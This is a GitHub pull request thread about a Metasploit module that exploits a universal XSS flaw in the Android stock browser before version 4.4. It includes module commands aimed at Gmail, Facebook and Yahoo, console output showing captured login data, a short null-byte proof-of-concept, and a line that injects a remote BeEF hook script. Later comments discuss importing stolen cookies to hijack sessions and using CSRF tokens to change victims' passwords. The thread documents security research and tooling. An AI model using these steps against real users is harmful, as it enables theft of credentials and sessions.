Android < 4.4 AOSP (Stock) Browser UXSS: cross-domain cookie/response extraction module #3759

Merged
merged 6 commits into from Sep 11, 2014

Conversation

Projects
None yet
8 participants
@jvennix-r7
Contributor

jvennix-r7 commented Sep 8, 2014

tl;dr: UXSS in AOSP browser allows for arbitrary cross-domain javascript.

I did not believe this at first, but after some testing it seems true: in AOSP browser before Android 4.4, you can load javascript into any arbitrary frame or window by prepending a NULL byte to a "javascript:..." string. This module automates loading and stealing HTML and cookies from cross-domain frames.

It was noticed at 1337day.com few days ago, and originally disclosed at Rafay Hacking Articles.

I don't see a public advisory for this anywhere from the vendor. :(

Note: If the site you are trying to steal uses the X-Frame-Options header, you can enable BYPASS_XFO to serve a one-click exploit that pops open and reuses a window.

Verification
  • Configure the module to steal the contents/cookies of example.com:

    msf> use auxiliary/gather/android_stock_browser_uxss
    msf> set TARGET_URLS http://example.com
    msf> run
    
  • Run the module and browse to it in the Stock AOSP browser on any Android < 4.4

  • You should see the captured HTML contents and (empty) cookie stored as loot

  • Configure the module to use the XFO bypass and steal the contents/cookies of http://www.google.com,https://m.facebook.com,https://www.yahoo.com:

    msf> use auxiliary/gather/android_stock_browser_uxss
    msf> set BYPASS_XFO true
    msf> set TARGET_URLS http://www.google.com,https://m.facebook.com,https://www.yahoo.com
    msf> run
    
  • Run the module and browse to it in the Stock AOSP browser on any Android < 4.4

  • Click the link. The exploit takes a lonnng time but should eventually load each URL individually

  • You should eventually see the captured HTML and (empty) cookie stored as loot

jvennix-r7 added some commits Sep 8, 2014

@jvennix-r7 jvennix-r7 changed the title from Android aosp uxss to Android < 4.4 AOSP (Stock) Browser UXSS: cross-domain cookie/response extraction module Sep 8, 2014

jvennix-r7 added some commits Sep 8, 2014

@todb-r7 todb-r7 added the module label Sep 8, 2014

+ OptString.new('CUSTOM_JS', [
+ false,
+ "A string of javascript to execute in the context of the target URLs.",
+ ''

This comment has been minimized.

@todb-r7

todb-r7 Sep 8, 2014

Contributor

Any ideas on what to provide here as useful? I wouldn't mind seeing something a little more eye-popping here -- if it's long, you can even add it in as a file: and stash it somewhere under data/exploits (all OptStrings take a file: argument, see https://dev.metasploit.com/api/Msf/OptString.html )

@todb-r7

todb-r7 Sep 8, 2014

Contributor

Any ideas on what to provide here as useful? I wouldn't mind seeing something a little more eye-popping here -- if it's long, you can even add it in as a file: and stash it somewhere under data/exploits (all OptStrings take a file: argument, see https://dev.metasploit.com/api/Msf/OptString.html )

This comment has been minimized.

@jvennix-r7

jvennix-r7 Sep 9, 2014

Contributor

@todb-r7 some generic post-UXSS scripts could be written, like "steal autofilled password/form contents", "submit form X with contents Y", or "steal HTTP response headers". Is that what you are thinking?

@jvennix-r7

jvennix-r7 Sep 9, 2014

Contributor

@todb-r7 some generic post-UXSS scripts could be written, like "steal autofilled password/form contents", "submit form X with contents Y", or "steal HTTP response headers". Is that what you are thinking?

This comment has been minimized.

@todb

todb Sep 9, 2014

Contributor

Yeah something along those lines that demos the seriousness of UXSS in general.

Sent from a tiny computer.
PGP KeyId: 4096R/F577904A
https://gist.github.com/todb-r7/84ae2e08eb4dafbc4822
Text (insecure): 512-438-9165

@todb

todb Sep 9, 2014

Contributor

Yeah something along those lines that demos the seriousness of UXSS in general.

Sent from a tiny computer.
PGP KeyId: 4096R/F577904A
https://gist.github.com/todb-r7/84ae2e08eb4dafbc4822
Text (insecure): 512-438-9165

@todb-r7 todb-r7 self-assigned this Sep 8, 2014

@antisnatchor

This comment has been minimized.

Show comment
Hide comment
@antisnatchor

antisnatchor Sep 9, 2014

Hey @todb-r7 @jvennix-r7 why don't you add the BeEF hook when you exploit the UXSS ;-)
I think this would be cool, and you would also benefit from our existing modules.

Anyway, I liked this stuff (the SOP bypass was too obvious :-), but nice exploit.

Hey @todb-r7 @jvennix-r7 why don't you add the BeEF hook when you exploit the UXSS ;-)
I think this would be cool, and you would also benefit from our existing modules.

Anyway, I liked this stuff (the SOP bypass was too obvious :-), but nice exploit.

@jvennix-r7

This comment has been minimized.

Show comment
Hide comment
@jvennix-r7

jvennix-r7 Sep 9, 2014

Contributor

@todb-r7 Here are some steps for demoing the UXSS scripts, using gmail.com login page as an example. gmail uses X-Frame-Options, so the one-click exploit is used.

Setup:

msf> set XFO_BYPASS true
msf> set CLOSE_POPUP false
msf> set TARGET_URLS https://gmail.com 
msf> set CUSTOM_JS file:/Users/joe/rapid7/msf-pristine/data/exploits/uxss/steal_form.js
msf> run
Steal entered passwords:

Open the PoC, click the link. A window will popup containing gmail.com. Attempt to log into gmail.com (using invalid creds is fine). Your entered credentials will be stored as the metasploit loot. You will be immediately asked to save your credentials in the browser, choose yes.

Steal saved passwords:

Now close and relaunch the browser, browse to the PoC, click the link. A window will popup containing gmail.com. The autofilled password is stolen and saved as loot.

Steal XHR response headers:
msf> set CUSTOM_JS file:/Users/joe/rapid7/msf-pristine/data/exploits/uxss/steal_headers.js
msf> rerun

Straightforward, browse to the page, click the link. Response headers get stored as loot.

Contributor

jvennix-r7 commented Sep 9, 2014

@todb-r7 Here are some steps for demoing the UXSS scripts, using gmail.com login page as an example. gmail uses X-Frame-Options, so the one-click exploit is used.

Setup:

msf> set XFO_BYPASS true
msf> set CLOSE_POPUP false
msf> set TARGET_URLS https://gmail.com 
msf> set CUSTOM_JS file:/Users/joe/rapid7/msf-pristine/data/exploits/uxss/steal_form.js
msf> run
Steal entered passwords:

Open the PoC, click the link. A window will popup containing gmail.com. Attempt to log into gmail.com (using invalid creds is fine). Your entered credentials will be stored as the metasploit loot. You will be immediately asked to save your credentials in the browser, choose yes.

Steal saved passwords:

Now close and relaunch the browser, browse to the PoC, click the link. A window will popup containing gmail.com. The autofilled password is stolen and saved as loot.

Steal XHR response headers:
msf> set CUSTOM_JS file:/Users/joe/rapid7/msf-pristine/data/exploits/uxss/steal_headers.js
msf> rerun

Straightforward, browse to the page, click the link. Response headers get stored as loot.

@jvennix-r7

This comment has been minimized.

Show comment
Hide comment
@jvennix-r7

jvennix-r7 Sep 9, 2014

Contributor

@antisnatchor thanks :D dropping beef is easy enough to do with CUSTOM_JS I think;

    msf> set CUSTOM_JS "var s=document.createElement('script');s.setAttribute('src','http://path.to/beef');document.body.appendChild(s);"
Contributor

jvennix-r7 commented Sep 9, 2014

@antisnatchor thanks :D dropping beef is easy enough to do with CUSTOM_JS I think;

    msf> set CUSTOM_JS "var s=document.createElement('script');s.setAttribute('src','http://path.to/beef');document.body.appendChild(s);"
@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Sep 11, 2014

Contributor

Okay, I was struggling around a little bit with figuring out when an exploit didn't work -- if a site is enforcing the X-Frame-Options header, then there's no indication to the user. Maybe a timeout? Maybe some more vprint_status indicators of what's going on? Not sure.

Shouldn't be a blocker to landing, but it makes it hard to diagnose what's going on.

Contributor

todb-r7 commented Sep 11, 2014

Okay, I was struggling around a little bit with figuring out when an exploit didn't work -- if a site is enforcing the X-Frame-Options header, then there's no indication to the user. Maybe a timeout? Maybe some more vprint_status indicators of what's going on? Not sure.

Shouldn't be a blocker to landing, but it makes it hard to diagnose what's going on.

@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Sep 11, 2014

Contributor

The example.com scenario works.

msf auxiliary(android_stock_browser_uxss) > show options

Module options (auxiliary/gather/android_stock_browser_uxss):

   Name         Current Setting     Required  Description
   ----         ---------------     --------  -----------
   BYPASS_XFO   false               no        Bypass URLs that have X-Frame-Options by using a one-click popup exploit.
   CLOSE_POPUP  true                no        When BYPASS_XFO is enabled, this closes the popup window after exfiltration.
   CUSTOM_JS                        no        A string of javascript to execute in the context of the target URLs.
   SRVHOST      192.168.43.169      yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      8080                yes       The local port to listen on.
   SSL          false               no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3                no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   TARGET_URLS  http://example.com  yes       The comma-separated list of URLs to steal.
   URIPATH      c01                 no        The URI to use for this exploit (default is random)

msf auxiliary(android_stock_browser_uxss) > run
[*] Auxiliary module execution completed
msf auxiliary(android_stock_browser_uxss) > 
[*] Using URL: http://192.168.43.169:8080/c01
[*] Server started.
[*] 192.168.43.150   android_stock_browser_uxss - Request 'GET /c01'
[*] 192.168.43.150   android_stock_browser_uxss - Sending initial HTML ...
[*] 192.168.43.150   android_stock_browser_uxss - Request 'POST /c01'
[+] Collected data from URL: http://example.com/
[+] Saved to: /home/todb/.msf4/loot/20140911131802_default_192.168.43.150_android.client_148715.txt
msf auxiliary(android_stock_browser_uxss) > cat /home/todb/.msf4/loot/20140911131802_default_192.168.43.150_android.client_148715.txt
[*] exec: cat /home/todb/.msf4/loot/20140911131802_default_192.168.43.150_android.client_148715.txt

{"cookie":"","url":"http://example.com/","body":"\n<div>\n    <h1>Example Domain</h1>\n    <p>This domain is established to be used for illustrative examples in documents. You may use this\n    domain in examples without prior coordination or asking for permission.</p>\n    <p><a href=\"http://www.iana.org/domains/example\">More information...</a></p>\n</div>\n\n\n","i":0}msf auxiliary(android_stock_browser_uxss) >
Contributor

todb-r7 commented Sep 11, 2014

The example.com scenario works.

msf auxiliary(android_stock_browser_uxss) > show options

Module options (auxiliary/gather/android_stock_browser_uxss):

   Name         Current Setting     Required  Description
   ----         ---------------     --------  -----------
   BYPASS_XFO   false               no        Bypass URLs that have X-Frame-Options by using a one-click popup exploit.
   CLOSE_POPUP  true                no        When BYPASS_XFO is enabled, this closes the popup window after exfiltration.
   CUSTOM_JS                        no        A string of javascript to execute in the context of the target URLs.
   SRVHOST      192.168.43.169      yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      8080                yes       The local port to listen on.
   SSL          false               no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3                no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   TARGET_URLS  http://example.com  yes       The comma-separated list of URLs to steal.
   URIPATH      c01                 no        The URI to use for this exploit (default is random)

msf auxiliary(android_stock_browser_uxss) > run
[*] Auxiliary module execution completed
msf auxiliary(android_stock_browser_uxss) > 
[*] Using URL: http://192.168.43.169:8080/c01
[*] Server started.
[*] 192.168.43.150   android_stock_browser_uxss - Request 'GET /c01'
[*] 192.168.43.150   android_stock_browser_uxss - Sending initial HTML ...
[*] 192.168.43.150   android_stock_browser_uxss - Request 'POST /c01'
[+] Collected data from URL: http://example.com/
[+] Saved to: /home/todb/.msf4/loot/20140911131802_default_192.168.43.150_android.client_148715.txt
msf auxiliary(android_stock_browser_uxss) > cat /home/todb/.msf4/loot/20140911131802_default_192.168.43.150_android.client_148715.txt
[*] exec: cat /home/todb/.msf4/loot/20140911131802_default_192.168.43.150_android.client_148715.txt

{"cookie":"","url":"http://example.com/","body":"\n<div>\n    <h1>Example Domain</h1>\n    <p>This domain is established to be used for illustrative examples in documents. You may use this\n    domain in examples without prior coordination or asking for permission.</p>\n    <p><a href=\"http://www.iana.org/domains/example\">More information...</a></p>\n</div>\n\n\n","i":0}msf auxiliary(android_stock_browser_uxss) >
@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Sep 11, 2014

Contributor

The BYPASS_XFO config seems to work fine as well:

msf auxiliary(android_stock_browser_uxss) > set BYPASS_XFO true
BYPASS_XFO => true
msf auxiliary(android_stock_browser_uxss) > set TARGET_URLS http://www.google.com,https://m.facebook.com,https://www.yahoo.com
TARGET_URLS => http://www.google.com,https://m.facebook.com,https://www.yahoo.com
msf auxiliary(android_stock_browser_uxss) > rexploit
[*] Stopping existing job...

[*] Server stopped.
[*] Reloading module...
[*] Auxiliary module execution completed
msf auxiliary(android_stock_browser_uxss) > 
[*] Using URL: http://192.168.43.169:8080/c01
[*] Server started.
[*] 192.168.43.150   android_stock_browser_uxss - Request 'GET /c01'
[*] 192.168.43.150   android_stock_browser_uxss - Sending initial HTML ...
[*] 192.168.43.150   android_stock_browser_uxss - Request 'POST /c01'
[+] Collected data from URL: http://www.google.com/
[+] Saved to: /home/todb/.msf4/loot/20140911132521_default_192.168.43.150_android.client_418146.txt
[*] 192.168.43.150   android_stock_browser_uxss - Request 'POST /c01'
[+] Collected data from URL: http://www.google.com/
[+] Saved to: /home/todb/.msf4/loot/20140911132522_default_192.168.43.150_android.client_639139.txt
[*] 192.168.43.150   android_stock_browser_uxss - Request 'POST /c01'
[+] Collected data from URL: https://www.yahoo.com/
[+] Saved to: /home/todb/.msf4/loot/20140911132525_default_192.168.43.150_android.client_597115.txt

msf auxiliary(android_stock_browser_uxss) > 

Note that the phone I'm using has never been to Facebook, so that seems to cause a loop on the redirect forever. Mildly annoying, not a blocker.

Contributor

todb-r7 commented Sep 11, 2014

The BYPASS_XFO config seems to work fine as well:

msf auxiliary(android_stock_browser_uxss) > set BYPASS_XFO true
BYPASS_XFO => true
msf auxiliary(android_stock_browser_uxss) > set TARGET_URLS http://www.google.com,https://m.facebook.com,https://www.yahoo.com
TARGET_URLS => http://www.google.com,https://m.facebook.com,https://www.yahoo.com
msf auxiliary(android_stock_browser_uxss) > rexploit
[*] Stopping existing job...

[*] Server stopped.
[*] Reloading module...
[*] Auxiliary module execution completed
msf auxiliary(android_stock_browser_uxss) > 
[*] Using URL: http://192.168.43.169:8080/c01
[*] Server started.
[*] 192.168.43.150   android_stock_browser_uxss - Request 'GET /c01'
[*] 192.168.43.150   android_stock_browser_uxss - Sending initial HTML ...
[*] 192.168.43.150   android_stock_browser_uxss - Request 'POST /c01'
[+] Collected data from URL: http://www.google.com/
[+] Saved to: /home/todb/.msf4/loot/20140911132521_default_192.168.43.150_android.client_418146.txt
[*] 192.168.43.150   android_stock_browser_uxss - Request 'POST /c01'
[+] Collected data from URL: http://www.google.com/
[+] Saved to: /home/todb/.msf4/loot/20140911132522_default_192.168.43.150_android.client_639139.txt
[*] 192.168.43.150   android_stock_browser_uxss - Request 'POST /c01'
[+] Collected data from URL: https://www.yahoo.com/
[+] Saved to: /home/todb/.msf4/loot/20140911132525_default_192.168.43.150_android.client_597115.txt

msf auxiliary(android_stock_browser_uxss) > 

Note that the phone I'm using has never been to Facebook, so that seems to cause a loop on the redirect forever. Mildly annoying, not a blocker.

@jvennix-r7

This comment has been minimized.

Show comment
Hide comment
@jvennix-r7

jvennix-r7 Sep 11, 2014

Contributor

@todb-r7, per the x-frame-options confusion, i could probably do something like hook onerror on the iframe, and then send something back to msfconsole saying the frame failed to load on the client.

Contributor

jvennix-r7 commented Sep 11, 2014

@todb-r7, per the x-frame-options confusion, i could probably do something like hook onerror on the iframe, and then send something back to msfconsole saying the frame failed to load on the client.

@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Sep 11, 2014

Contributor

Password stealing from gmail seems to work like a champ. Woot:

$ grep :\"Email ~/.msf4/loot/*.txt
/home/todb/.msf4/loot/20140911133827_default_192.168.43.150_android.client_269370.txt:{"name":"Email","value":"msf.victim","url":"https://accounts.google.com/ServiceLogin?service=mail&passive=true&continue=https://mail.google.com/mail/?ui%3Dmobile%26zyp%3Dl&scc=1&ltmpl=ecobx&nui=5&btmpl=mobile&emr=1","send":true}

Also works for the password.

Also works for typed passwords, but you get them like one or two characters at a time.

Contributor

todb-r7 commented Sep 11, 2014

Password stealing from gmail seems to work like a champ. Woot:

$ grep :\"Email ~/.msf4/loot/*.txt
/home/todb/.msf4/loot/20140911133827_default_192.168.43.150_android.client_269370.txt:{"name":"Email","value":"msf.victim","url":"https://accounts.google.com/ServiceLogin?service=mail&passive=true&continue=https://mail.google.com/mail/?ui%3Dmobile%26zyp%3Dl&scc=1&ltmpl=ecobx&nui=5&btmpl=mobile&emr=1","send":true}

Also works for the password.

Also works for typed passwords, but you get them like one or two characters at a time.

@jvennix-r7

This comment has been minimized.

Show comment
Hide comment
@jvennix-r7

jvennix-r7 Sep 11, 2014

Contributor

@todb-r7, yeah there's no real good way to check that the popup window has actually loaded, thanks to SOP. I basically wait until I can't access the new window from js (due to SOP), then wait a few moments for the document.body/synchronous script frames to finish loading, and then i try injecting. This can fail in a redirect loop, or if the init scripts in the document are huge and long. There is a final injection attempt after ~10 seconds, in case we hit this condition, then the script should give up and move on.

Tbh the loading multiple-documents in the same popup window is a bit of a parlor trick (what kind of user is going to sit there and watch all their sensitive sites load one-by-one?), but it is neat to watch and proves that opt-in XFO headers is really not an obstacle to UXSS.

Contributor

jvennix-r7 commented Sep 11, 2014

@todb-r7, yeah there's no real good way to check that the popup window has actually loaded, thanks to SOP. I basically wait until I can't access the new window from js (due to SOP), then wait a few moments for the document.body/synchronous script frames to finish loading, and then i try injecting. This can fail in a redirect loop, or if the init scripts in the document are huge and long. There is a final injection attempt after ~10 seconds, in case we hit this condition, then the script should give up and move on.

Tbh the loading multiple-documents in the same popup window is a bit of a parlor trick (what kind of user is going to sit there and watch all their sensitive sites load one-by-one?), but it is neat to watch and proves that opt-in XFO headers is really not an obstacle to UXSS.

@jvennix-r7

This comment has been minimized.

Show comment
Hide comment
@jvennix-r7

jvennix-r7 Sep 11, 2014

Contributor

@todb-r7 so the reason it gets them 1-2 chars at a time is i am installing a javascript loop that checks for changed inputs and sends them up on the fly. This was the easiest thing to do, and has the added benefit of catching any accidental input (e.g. I accidentally typed the password for facebook into gmail.com, oops).

I feel like the multiple json files are unnecessary though, do you think i should just do store_loot once and then append any more JSON responses to the same file?

Contributor

jvennix-r7 commented Sep 11, 2014

@todb-r7 so the reason it gets them 1-2 chars at a time is i am installing a javascript loop that checks for changed inputs and sends them up on the fly. This was the easiest thing to do, and has the added benefit of catching any accidental input (e.g. I accidentally typed the password for facebook into gmail.com, oops).

I feel like the multiple json files are unnecessary though, do you think i should just do store_loot once and then append any more JSON responses to the same file?

@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Sep 11, 2014

Contributor

Yeah this is kind of a big deal. Let's see if I can't throw some more recent refs on this, then land it.

FWIW I tested on my Kyocera Hydro C5170. Bought it earlier this year, it's running Android 4.0.4, carrier is Boost Mobile.

Other details:

Build number IML77, Software version 1.010BT, Kernel version 3.0.8-perf (released Aug 7, 14:26:30 JST 2013).

Let's see if I have any updates it's not telling me about... well I get a "Network Busy" error, whatever that means, so I'll just say no.

Contributor

todb-r7 commented Sep 11, 2014

Yeah this is kind of a big deal. Let's see if I can't throw some more recent refs on this, then land it.

FWIW I tested on my Kyocera Hydro C5170. Bought it earlier this year, it's running Android 4.0.4, carrier is Boost Mobile.

Other details:

Build number IML77, Software version 1.010BT, Kernel version 3.0.8-perf (released Aug 7, 14:26:30 JST 2013).

Let's see if I have any updates it's not telling me about... well I get a "Network Busy" error, whatever that means, so I'll just say no.

todb-r7 added a commit to todb-r7/metasploit-framework that referenced this pull request Sep 11, 2014

todb-r7 added a commit to todb-r7/metasploit-framework that referenced this pull request Sep 11, 2014

@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Sep 11, 2014

Contributor

PR coming your way @jvennix-r7 just some quick eyeballs is enough.

Contributor

todb-r7 commented Sep 11, 2014

PR coming your way @jvennix-r7 just some quick eyeballs is enough.

@todb-r7 todb-r7 merged commit 7793ed4 into rapid7:master Sep 11, 2014

1 check passed

continuous-integration/travis-ci The Travis CI build passed
Details

todb-r7 added a commit that referenced this pull request Sep 11, 2014

Land #3759, Android UXSS, with ref/desc fixes
Incidentally, this also closes jvennix-r7#14 (let's see if I can close a
PR by merging from another repo!)

Also fixes #3782 (opened by accident).
@rafaybaloch

This comment has been minimized.

Show comment
Hide comment
@rafaybaloch

rafaybaloch Sep 15, 2014

I tried reporting this issue to google way before i blogged about it, they were unable to reproduce it despite of all my efforts and closed the issue, And when i released the blogpost. They replied with the following:

"Rafay,

After continued testing we were able to reproduce this. We are now working internally on a suitable fix.

-- Josh Armour
-- Android Security"

@antisnatchor Agreed, but despite of it being so simple it was never found by anyone ;).

I tried reporting this issue to google way before i blogged about it, they were unable to reproduce it despite of all my efforts and closed the issue, And when i released the blogpost. They replied with the following:

"Rafay,

After continued testing we were able to reproduce this. We are now working internally on a suitable fix.

-- Josh Armour
-- Android Security"

@antisnatchor Agreed, but despite of it being so simple it was never found by anyone ;).

@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Sep 15, 2014

Contributor

Just to confirm, I tested com.android.browser, version 4.4.4-1f023a4eca on my CyanogenMod build for Android, and the vuln appears patched there. The example.com attack isn't effective, at any rate.

Contributor

todb-r7 commented Sep 15, 2014

Just to confirm, I tested com.android.browser, version 4.4.4-1f023a4eca on my CyanogenMod build for Android, and the vuln appears patched there. The example.com attack isn't effective, at any rate.

@jvennix-r7

This comment has been minimized.

Show comment
Hide comment
@jvennix-r7

jvennix-r7 Sep 16, 2014

Contributor

@todb-r7 I am now thinking this was patched when they replaced the internals of WebView to use Chrome. So the bug was fixed as a side-effect. Commit:

https://android.googlesource.com/platform/frameworks/base/+/94c0057d67c2e0a4b88a4f735388639210260d0e

Contributor

jvennix-r7 commented Sep 16, 2014

@todb-r7 I am now thinking this was patched when they replaced the internals of WebView to use Chrome. So the bug was fixed as a side-effect. Commit:

https://android.googlesource.com/platform/frameworks/base/+/94c0057d67c2e0a4b88a4f735388639210260d0e

@jvennix-r7

This comment has been minimized.

Show comment
Hide comment
@jvennix-r7

jvennix-r7 Sep 16, 2014

Contributor

@fritek373 , sample test:

<iframe name="test" src="http://www.rhainfosec.com" onload="f()"></iframe> 
<script>
  function f() {
    window.open('\u0000javascript:alert(document.domain)', 'test');
  }
</script>
Contributor

jvennix-r7 commented Sep 16, 2014

@fritek373 , sample test:

<iframe name="test" src="http://www.rhainfosec.com" onload="f()"></iframe> 
<script>
  function f() {
    window.open('\u0000javascript:alert(document.domain)', 'test');
  }
</script>
@fritek373

This comment has been minimized.

Show comment
Hide comment
@fritek373

fritek373 Sep 16, 2014

@todb-r7 Yeah, I understand :)

@todb-r7 Yeah, I understand :)

@jvennix-r7

This comment has been minimized.

Show comment
Hide comment
@jvennix-r7

jvennix-r7 Sep 16, 2014

Contributor

@antisnatchor we've added a REMOTE_JS datastore option to make dropping your BeEf hook a snap: #3801

Contributor

jvennix-r7 commented Sep 16, 2014

@antisnatchor we've added a REMOTE_JS datastore option to make dropping your BeEf hook a snap: #3801

@antisnatchor

This comment has been minimized.

Show comment
Hide comment
@antisnatchor

antisnatchor Sep 17, 2014

@jvennix-r7 thanks, make sense ;-)

@jvennix-r7 thanks, make sense ;-)

@todb-r7

This comment has been minimized.

Show comment
Hide comment
@todb-r7

todb-r7 Sep 18, 2014

Contributor

Confirmed on:

Samsung SPH-M830 (Galaxy Rush)

Android 4.1.2, kernel version 3.0.31-1175327

Carrier: Boost Mobile Networks (USA)

No firmware update available.

Contributor

todb-r7 commented Sep 18, 2014

Confirmed on:

Samsung SPH-M830 (Galaxy Rush)

Android 4.1.2, kernel version 3.0.31-1175327

Carrier: Boost Mobile Networks (USA)

No firmware update available.

@armujahid

This comment has been minimized.

Show comment
Hide comment
@armujahid

armujahid Sep 21, 2014

Can anyone tell me how to automatically import cookies from loot file into the browser ? :P. It has both cookies and html. I know how to manually import it but I want to use automatic tool like cookie manager or grease monkey cookie injector

Can anyone tell me how to automatically import cookies from loot file into the browser ? :P. It has both cookies and html. I know how to manually import it but I want to use automatic tool like cookie manager or grease monkey cookie injector

@fritek373

This comment has been minimized.

Show comment
Hide comment
@fritek373

fritek373 Sep 21, 2014

In Chrome:
https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=nl
Op 21 sep. 2014 12:41 schreef "Abdul Rauf" notifications@github.com:

Can anyone tell me how to automatically import cookies from loot file into
the browser ? :P. It has both cookies and html. I know how to manually
import it but I want to use automatic tool like cookie manager or grease
monkey cookie injector


Reply to this email directly or view it on GitHub
#3759 (comment)
.

In Chrome:
https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=nl
Op 21 sep. 2014 12:41 schreef "Abdul Rauf" notifications@github.com:

Can anyone tell me how to automatically import cookies from loot file into
the browser ? :P. It has both cookies and html. I know how to manually
import it but I want to use automatic tool like cookie manager or grease
monkey cookie injector


Reply to this email directly or view it on GitHub
#3759 (comment)
.

@armujahid

This comment has been minimized.

Show comment
Hide comment
@armujahid

armujahid Sep 21, 2014

loot file doesn't contain complete cookies. I have tried to side jack facebook session. but I only got c_user and csm. datr is missing from cookies.

loot file doesn't contain complete cookies. I have tried to side jack facebook session. but I only got c_user and csm. datr is missing from cookies.

@rafaybaloch

This comment has been minimized.

Show comment
Hide comment
@rafaybaloch

rafaybaloch Sep 21, 2014

Well, it's due to the fact that facebook uses httponly flag for session
cookie xs, but you can read the response using the innerHTML property.

On Sun, Sep 21, 2014 at 4:17 PM, Abdul Rauf notifications@github.com
wrote:

loot file doesn't contain complete cookies. I have tried to side jack
facebook session. but I only got c_user and csm. datr is missing from
cookies.


Reply to this email directly or view it on GitHub
#3759 (comment)
.

Warm Regards,
Rafay Baloch

http://rafayhackingarticles.net
http://techlotips.com

Well, it's due to the fact that facebook uses httponly flag for session
cookie xs, but you can read the response using the innerHTML property.

On Sun, Sep 21, 2014 at 4:17 PM, Abdul Rauf notifications@github.com
wrote:

loot file doesn't contain complete cookies. I have tried to side jack
facebook session. but I only got c_user and csm. datr is missing from
cookies.


Reply to this email directly or view it on GitHub
#3759 (comment)
.

Warm Regards,
Rafay Baloch

http://rafayhackingarticles.net
http://techlotips.com

@jvennix-r7

This comment has been minimized.

Show comment
Hide comment
@jvennix-r7

jvennix-r7 Sep 21, 2014

Contributor

@armujahid You will probably have better luck posting on the dicussion boards here. As @rafaybaloch notes you still can't steal HttpOnly cookies. However you can find the CSRF token and you can send requests with this cookie attached, so you could send a request to something like a /password_change endpoint.

Contributor

jvennix-r7 commented Sep 21, 2014

@armujahid You will probably have better luck posting on the dicussion boards here. As @rafaybaloch notes you still can't steal HttpOnly cookies. However you can find the CSRF token and you can send requests with this cookie attached, so you could send a request to something like a /password_change endpoint.

@armujahid

This comment has been minimized.

Show comment
Hide comment
@dimpol

This comment has been minimized.

Show comment
Hide comment
@dimpol

dimpol Jul 6, 2016

Hi everyone, first of all a big thanks to @rafaybaloch for his help. I am trying to do the exact same thing but between a tab and a triggered web view in the browser (from a browsable intent). Meaning that i would like to access the triggered web views contents (e.g InnerHTML). So what i did was execute the msf module with set TARGET_URLS = intent:#Intent;S.url=http://attackersite.com;SEL;component=com.package.name/Activityname; Don't pay attention to what i am writing on the intent:# part just focus on the fact that the module creates a page that when visited by the victim a web view (from the app with the browsable intent) is triggered. So far everything is great. The thing is i am not yet able to get the triggered webview's contents like it would normally do on a page if we set TARGET_URLS = the page we want to target. I think the triggered webview's contents should be accessible somehow just like the modules does for webpages.... any ideas? Ideally i would like to inject beef to the triggered webview. *All that trouble because i am trying to prove that a remotely triggered webview (due to a browsable intent) chained with SOP bypass is a serious attack.....

dimpol commented Jul 6, 2016

Hi everyone, first of all a big thanks to @rafaybaloch for his help. I am trying to do the exact same thing but between a tab and a triggered web view in the browser (from a browsable intent). Meaning that i would like to access the triggered web views contents (e.g InnerHTML). So what i did was execute the msf module with set TARGET_URLS = intent:#Intent;S.url=http://attackersite.com;SEL;component=com.package.name/Activityname; Don't pay attention to what i am writing on the intent:# part just focus on the fact that the module creates a page that when visited by the victim a web view (from the app with the browsable intent) is triggered. So far everything is great. The thing is i am not yet able to get the triggered webview's contents like it would normally do on a page if we set TARGET_URLS = the page we want to target. I think the triggered webview's contents should be accessible somehow just like the modules does for webpages.... any ideas? Ideally i would like to inject beef to the triggered webview. *All that trouble because i am trying to prove that a remotely triggered webview (due to a browsable intent) chained with SOP bypass is a serious attack.....

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment